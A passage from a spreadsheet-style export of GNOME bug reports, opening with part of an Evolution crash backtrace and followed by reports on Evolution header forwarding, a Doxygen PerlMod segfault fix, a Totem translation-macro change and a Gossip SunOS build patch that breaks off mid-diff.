#90 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#91 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#92 0xb789a0e0 in gtk_box_pack_start_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#93 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#94 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#95 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#96 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#97 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#98 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#99 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#100 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#101 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#102 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#103 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#104 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#105 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#106 0xb7d77e2c in bonobo_dock_new () from /usr/lib/libbonoboui-2.so.0
#107 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#108 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#109 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#110 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#111 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#112 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#113 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#114 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#115 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#116 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#117 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#118 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#119 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#120 0xb789a0e0 in gtk_box_pack_start_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#121 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#122 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#123 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#124 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#125 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#126 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#127 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#128 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#129 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#130 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#131 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#132 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#133 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#134 0xb789649f in gtk_button_box_set_child_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
#135 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#136 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#137 0xb7a95101 in gtk_window_new () from /usr/lib/libgtk-x11-2.0.so.0
#138 0xb5919288 in destroy (object=0x81c0220) at e-msg-composer.c:2846
#139 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#140 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#141 0xb758979b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#142 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#143 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#144 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#145 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#146 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#147 0xb7a92006 in _gtk_window_unset_focus_and_default ()
   from /usr/lib/libgtk-x11-2.0.so.0
#148 0xb7dabc26 in bonobo_window_remove_popup ()
   from /usr/lib/libbonoboui-2.so.0
#149 0xb59193fe in composer_dispose (object=0x81c0220)
    at e-msg-composer.c:2745
#150 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#151 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#152 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#153 0xb58b231e in composer_send_queued_cb (folder=0x816f6d0 msg=0x879502c 
    info=0x9c6acc0 queued=1 appended_uid=0xb4df42d8 433 data=0x9ae7df8)
    at em-composer-utils.c:214
#154 0xb58f8d2b in append_mail_appended (mm=0x9c6d5f8) at mail-ops.c:880
#155 0xb58f7065 in mail_msgport_replied (source=0x81355d0 cond=G_IO_IN 
    d=0x814e358) at mail-mt.c:461
#156 0xb753dc8d in g_io_channel_unix_get_fd () from /usr/lib/libglib-2.0.so.0
#157 0xb7514802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#158 0xb75177df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#159 0xb7517b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#160 0xb7cfaa23 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#161 0x0805f718 in main (argc=2 argv=0xbf8fb534) at main.c:615
Thread 12 (Thread -1251906672 (LWP 14158)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x81934f8) at e-msgport.c:643
	rfds = {__fds_bits = {0 128 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x8193498) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 3043060624
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 11 (Thread -1261438064 (LWP 14193)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x81934f8) at e-msgport.c:643
	rfds = {__fds_bits = {0 128 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x8193498) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 3033529232
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 10 (Thread -1278915696 (LWP 14194)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x81934f8) at e-msgport.c:643
	rfds = {__fds_bits = {0 128 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x8193498) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 3016051600
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 9 (Thread -1295701104 (LWP 14197)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x8135520) at e-msgport.c:643
	rfds = {__fds_bits = {0 8 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x81354c0) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2999266192
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 8 (Thread -1287308400 (LWP 14233)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x81934f8) at e-msgport.c:643
	rfds = {__fds_bits = {0 128 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x8193498) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 3007658896
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 7 (Thread -1304474736 (LWP 14234)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x81934f8) at e-msgport.c:643
	rfds = {__fds_bits = {0 128 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x8193498) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2990492560
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 6 (Thread -1312867440 (LWP 14241)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x836ded0) at e-msgport.c:643
	rfds = {__fds_bits = {0 0 0 0 0 0 0 0 0 32768 
    0 }}
#3  0xb72025e9 in thread_dispatch (din=0x836e448) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2982099856
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 5 (Thread -1321616496 (LWP 14296)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x819b6d8) at e-msgport.c:643
	rfds = {__fds_bits = {-2147483648 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x819b678) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2973350800
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 4 (Thread -1341322352 (LWP 14305)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb713a231 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7201f1c in e_msgport_wait (mp=0x81934f8) at e-msgport.c:643
	rfds = {__fds_bits = {0 128 0 }}
#3  0xb72025e9 in thread_dispatch (din=0x8193498) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2953644944
#4  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1350149232 (LWP 14354)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71376f3 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7517813 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7517b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7c266f0 in link_set_io_thread () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb753238f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1350415472 (LWP 14576)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71376f3 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7517813 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7517b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7224e62 in startup_mainloop (arg=0x0) at e-book.c:3760
	loop = (GMainLoop *) 0xfffffffc
#5  0xb753238f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb6fcf31b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb71413ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1233442608 (LWP 13976)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb710169b in waitpid () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7e281b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x0805f8e9 in segv_redirect (sig=11) at main.c:426
No locals.
#4  
No symbol table info available.
#5  0xb74ad7c9 in html_object_destroy () from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#6  0xb7490be1 in html_engine_table_set_spacing ()
   from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#7  0xb74cda7a in html_undo_data_unref () from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#8  0xb74ce5cd in html_undo_action_destroy ()
   from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#9  0xb74cd90a in html_undo_data_ref () from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#10 0xb74cdca1 in html_undo_destroy () from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#11 0xb74a184a in html_engine_new () from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#12 0xb758baec in g_object_unref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0xb7472933 in gtk_html_get_selection_html ()
   from /usr/lib/libgtkhtml-3.8.so.15
No symbol table info available.
#14 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0xb789649f in gtk_button_box_set_child_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0xb79c1568 in _gtk_scrolled_window_get_scrollbar_spacing ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0xb79c3e11 in gtk_scrolled_window_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#39 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0xb789a0e0 in gtk_box_pack_start_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#42 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#43 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#44 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#47 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#48 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#49 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#50 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#51 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#52 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#53 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#54 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#55 0xb7d88c07 in bonobo_control_set_plug () from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#56 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#57 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0xb758979b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#59 0xb759a1e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#60 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#61 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#62 0xb7d00ba4 in bonobo_object_unref () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#63 0xb7d01030 in bonobo_object_list_unref_all ()
   from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#64 0xb7c763c6 in _ORBIT_skel_small_Bonobo_Unknown_unref ()
   from /usr/lib/libbonobo-activation.so.4
No symbol table info available.
#65 0xb7c1abe0 in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#66 0xb7c77edf in Bonobo_Unknown_unref ()
   from /usr/lib/libbonobo-activation.so.4
No symbol table info available.
#67 0xb7cffd94 in bonobo_object_release_unref ()
   from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#68 0xb7d8603a in bonobo_control_frame_bind_to_control ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#69 0xb7d861f2 in bonobo_control_frame_bind_to_control ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#70 0xb758ba4b in g_object_unref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#71 0xb7d009e7 in bonobo_object_unref () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#72 0xb7d8c8b6 in bonobo_socket_set_control_frame ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#73 0xb7d8caf7 in bonobo_socket_new () from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#74 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#75 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#76 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0xb789649f in gtk_button_box_set_child_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#78 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#79 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#80 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#81 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#82 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#83 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#84 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#85 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#86 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#87 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#88 0xb7daaa15 in bonobo_widget_new_control_async ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#89 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#90 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#91 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#92 0xb789a0e0 in gtk_box_pack_start_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#93 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#94 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#95 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#96 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#97 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#98 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#99 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#100 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#101 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#102 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#103 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2</t>
  </si>
  <si>
    <t>EVOLUTION-215067</t>
  </si>
  <si>
    <t>Still cannot forward complete headers required by abuse teams when reporting spam</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.99.1
Synopsis: Still cannot forward complete headers required by abuse teams when reporting spam
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
when forwarding messages headers are not included in the forward and
there is no (visible) capability to copy or paste the headers into the
forwarded message.
Abuse teams at ISP's will not accept messages without full headers. 
This makes reporting such spam impossible with evolution.
</t>
  </si>
  <si>
    <t>scomps</t>
  </si>
  <si>
    <t>DOXYGEN-431049</t>
  </si>
  <si>
    <t>GENERATE_PERLMOD = YES crashes doxygen</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. This bug can be reproduced on restypedef example code included as part of doxygen-1.5.2 package.
2. Use doxywizard on restypedef.cfg set GENERATE_PERLMOD=YES and PERLMOD_LATEX to YES
3. You will see a segmentation fault  on doing doxygen restypedef.cfg
Stack trace:
vdasari@boslx0462:examples &gt; doxygen restypedef.cfg
Segmentation fault
Other information:
I downloaded the code and compiled the code with debug options. I found that doxygen is crashing in PerlModGenerator::generatePerlModForClass at     MemberGroupSDict::Iterator mgli(*cd-&gt;getMemberGroupSDict()) The reason for the crash is cd-&gt;getMemberGroupSDict() is returning NULL. If I modify the code to avoid calling Iterator when getMemberGroupSDict() returns NULL doxygen works fine and generates all required files for generating pdf.
New change is:
vdasari@boslx0462:doxygen-1.5.2 &gt; diff -b src/perlmodgen.cpp ~/doxygen-1.5.2/src/perlmodgen.cpp
1694a16951696
&gt;   if (cd-&gt;getMemberGroupSDict())
&gt;   {
1698a1701
&gt;   }
New code looks lik
  if (cd-&gt;getMemberGroupSDict())
  {
    MemberGroupSDict::Iterator mgli(*cd-&gt;getMemberGroupSDict())
    MemberGroup *mg
    for ((mg=mgli.current())++mgli)
      generatePerlModSection(cdmg-&gt;members()user_definedmg-&gt;header())
  }
Looks like there are some other places in the same file where there is no check for NULL before calling Iterator. So I guess either Iterator class or all the callers of Iterators have to be fixed. My 2 cents.</t>
  </si>
  <si>
    <t>vdasari.t</t>
  </si>
  <si>
    <t>TOTEM-513627</t>
  </si>
  <si>
    <t>Use C_() instead of Q_() with context</t>
  </si>
  <si>
    <t>As per http://live.gnome.org/GnomeGoals/MsgctxtMigration we should use C_() instead of Q_() for messages with context.
Patch on its way.</t>
  </si>
  <si>
    <t>GOSSIP-415225</t>
  </si>
  <si>
    <t>Compilation errors on SunOS</t>
  </si>
  <si>
    <t>Gossip fails to build on SunOS because of the following issues:
--- gossip-0.22/protocols/jabber/gossip-jabber.c~    Do Mrz  1 16:42:12 2007
+++ gossip-0.22/protocols/jabber/gossip-jabber.c    Do Mrz  1 16:42:36 2007
@@ -32697 +32696 @@
     jabber = GOSSIP_JABBER (provider)
     priv = GET_PRIV (jabber)
-    return gossip_jabber_chatrooms_cancel (priv-&gt;chatrooms id)
 }
 static void
@@ -35007 +34996 @@
     jabber = GOSSIP_JABBER (provider)
     priv = GET_PRIV (jabber)
-    return gossip_jabber_ft_cancel (priv-&gt;fts id)
 }
 static void
@@ -35167 +35146 @@
     jabber = GOSSIP_JABBER (provider)
     priv = GET_PRIV (jabber)
-    return gossip_jabber_ft_accept (priv-&gt;fts id)
 }
 static void
@@ -35327 +35296 @@
     jabber = GOSSIP_JABBER (provider)
     priv = GET_PRIV (jabber)
-    return gossip_jabber_ft_decline (priv-&gt;fts id)
 }
 /*
--- gossip-0.22/libgossip/gossip-time.c~    Do Mrz  1 16:50:28 2007
+++ gossip-0.22/libgossip/gossip-time.c    Do Mrz  1 16:50:01 2007
@@ -216 +217 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include gossip-time.h
@@ -336 +3425 @@
     return time (NULL)
 }
+/* taken from the timegm manpage from glibc assumed to be GPL (??) */
+static time_t
